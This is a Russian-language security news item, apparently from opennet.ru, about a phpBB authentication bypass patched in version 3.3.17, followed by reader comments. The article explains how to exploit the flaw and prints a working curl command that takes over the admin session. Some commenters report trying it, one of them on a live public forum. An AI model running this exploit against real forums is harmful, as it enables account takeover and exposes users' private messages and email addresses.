Уязвимость в phpBB, позволяющая получить доступ к любому аккаунту без аутентификации

11.06.2026 22:43 (MSK)

В свободном движке для создания форумов phpBB выявлена уязвимость, позволяющая через отправку одного HTTP-запроса подключиться к сеансу любого пользователя форума. Уязвимость проявляется в конфигурации phpBB по умолчанию. Проблема устранена в версии phpBB 3.3.17.

При атаке на обычных пользователей можно получить доступ к приватной переписке и возможности отправлять сообщения от имени пользователя. При атаке на модераторов и администраторов можно удалять чужие сообщения, просматривать IP-адреса и email, читать приватную переписку, но нельзя зайти в интерфейс администратора и получить доступ к хосту.

Детали об уязвимости не приводятся, но при помощи AI на основе исправления уже воссоздан метод эксплуатации, основанный на обращении к обработчику "login_link" с выставлением метода аутентификации "auth_provider=apache" и подстановкой логина через Basic Auth, после чего PHP выставит переменную окружения "PHP_AUTH_USER=логин", а phpBB извлечёт из неё логин пользователя без проверки пароля. Например, для получения идентификатора сессии пользователя admin и сохранения его в файл cookies.txt можно выполнить код:


   curl -i -s \
     -c cookies.txt \
     -b cookies.txt \
     -u 'admin:anything' \
     -d 'login=Login&login_username=admin&login_password=anything' \
     'https://target.example/forum/ucp.php?mode=login_link&auth_provider=apache&login_link_any=1'

исправить +20 +/–

Лицензия: CC BY 3.0

Наводку на новость прислал Аноним

Короткая ссылка: https://opennet.ru/65667-phpbb

Ключевые слова: phpbb

При перепечатке указание ссылки на opennet.ru обязательно

Обсуждение (18)

1.1, Аноним (1), 22:55, 11/06/2026 [ответить] [﹢﹢﹢] [ · · · ]	+10 +/–
Ух что сейчас будет с форумами.. Блин, надеюсь архивы есть. Пингуйте всех админов срочно, столько ценных данных потерять можем. Я проверил, реально работает, и это реально пи****. Можно залогиниться под админом. В админку зайти НЕЛЬЗЯ (т.к. phpBB спрашивает пароль ещё раз), но в модераторскую панель можно, и там можно много чего. Логи модерации, IPшки. Можно смотреть адреса почты всех юзеров. Можно логиниться всеми юзерами и скрапить ЛС.

2.7, Аноним (7), 23:23, 11/06/2026 [^] [^^] [^^^] [ответить]	+6 +/–
> в модераторскую панель можно, и там можно много чего. Логи модерации, IPшки. Можно смотреть адреса почты всех юзеров. Можно логиниться всеми юзерами и скрапить ЛС. Ой, я вас умоляю. В том и плюс классических форумов, что кроме адреса почты там ничего ценного не наскрапишь, ибо не реального имени, ни номера телефона и т.п. они не требуют.

1.2, Аноним (2), 22:57, 11/06/2026 [ответить] [﹢﹢﹢] [ · · · ]	+2 +/–
Лол, а норм что на Linux Mint форуме это работает?)) https://forums.linuxmint.com/viewtopic.php?p=1430678#p1430678 послание внизу оставил

1.4, Аноним (4), 23:12, 11/06/2026 Скрыто ботом-модератором [﹢﹢﹢] [ · · · ] [к модератору]	+3 +/–

2.8, q (ok), 23:38, 11/06/2026 Скрыто ботом-модератором [к модератору]	–3 +/–

1.10, Аноним (10), 01:08, 12/06/2026 [ответить] [﹢﹢﹢] [ · · · ]	+1 +/–
Ух, как будто бы во времени назад вернулся.

1.14, Аноним (14), 08:17, 12/06/2026 [ответить] [﹢﹢﹢] [ · · · ]	+1 +/–
раньше тут в новостях к уязвимрстям патч выкладывали, а теперь эксплойты в замечательное время мы живем

1.16, Аноним (16), 09:48, 12/06/2026 [ответить] [﹢﹢﹢] [ · · · ]	+/–
А вот не был бы двиг с открытым исходным кодом никто бы никогда уязвимость не нашел.

2.18, Аноним (-), 10:45, 12/06/2026 [^] [^^] [^^^] [ответить]	+/–
LoL. Такую уязвимость трудно не найти.

3.20, Аноним (20), 12:55, 12/06/2026 [^] [^^] [^^^] [ответить]	+1 +/–
Тогда почему ее за десяток лет не нашли? Лол

4.22, Аноним (22), 13:37, 12/06/2026 [^] [^^] [^^^] [ответить]	+/–
Для успешной эксплуатации уязвимость не надо оглашать.

4.26, Аноним (-), 14:09, 12/06/2026 [^] [^^] [^^^] [ответить]

+/–

Нашли ведь.

Эта уязвимость слишком неочевидная, если ориентироваться только на код.

Для опытного специалиста поиск такой уязвимости "в слепую" не представляет большой сложности (гораздо проще, чем чисто через код). У такого уже есть в голове набор алгоритмов и шаблонов для этого.

PHP_AUTH_USER — классический источник проблем...

1.17, Аноним (17), 10:20, 12/06/2026 [ответить] [﹢﹢﹢] [ · · · ]	+/–
то то рутрекер лежит в посл время

2.19, Гость (??), 10:53, 12/06/2026 [^] [^^] [^^^] [ответить]	+/–
рутрекер лежит из-за того хоститься нигде не может продолжительное время, трекеры нагрузку не держат и cloudflare надо много платить за достаточную защиту phpbb там древний 2 версии и сильно модифицированный

3.23, Аноним (22), 13:39, 12/06/2026 [^] [^^] [^^^] [ответить]	+/–
> и cloudflare надо много платить Рутрекер за клаудфлярей?! Клаудфляра же гасит огромную долю реальных юзеров... А вот правильных ботов как раз пропускает.

4.25, Гость (??), 13:49, 12/06/2026 [^] [^^] [^^^] [ответить]	+/–
> Рутрекер за клаудфлярей?! Да, c 2023 года полностью прячется за CF, форум ещё раньше

4.28, Аноним (28), 17:09, 12/06/2026 [^] [^^] [^^^] [ответить]	+/–
Напишите администрации рутрекера, что вам виднее, как бороться с ддосом.

2.27, Аноним (28), 17:08, 12/06/2026 [^] [^^] [^^^] [ответить]	+/–
Через их расширение для браузера всегда доступна.

игнорирование участников | лог модерирования

Добавить комментарий

Текст: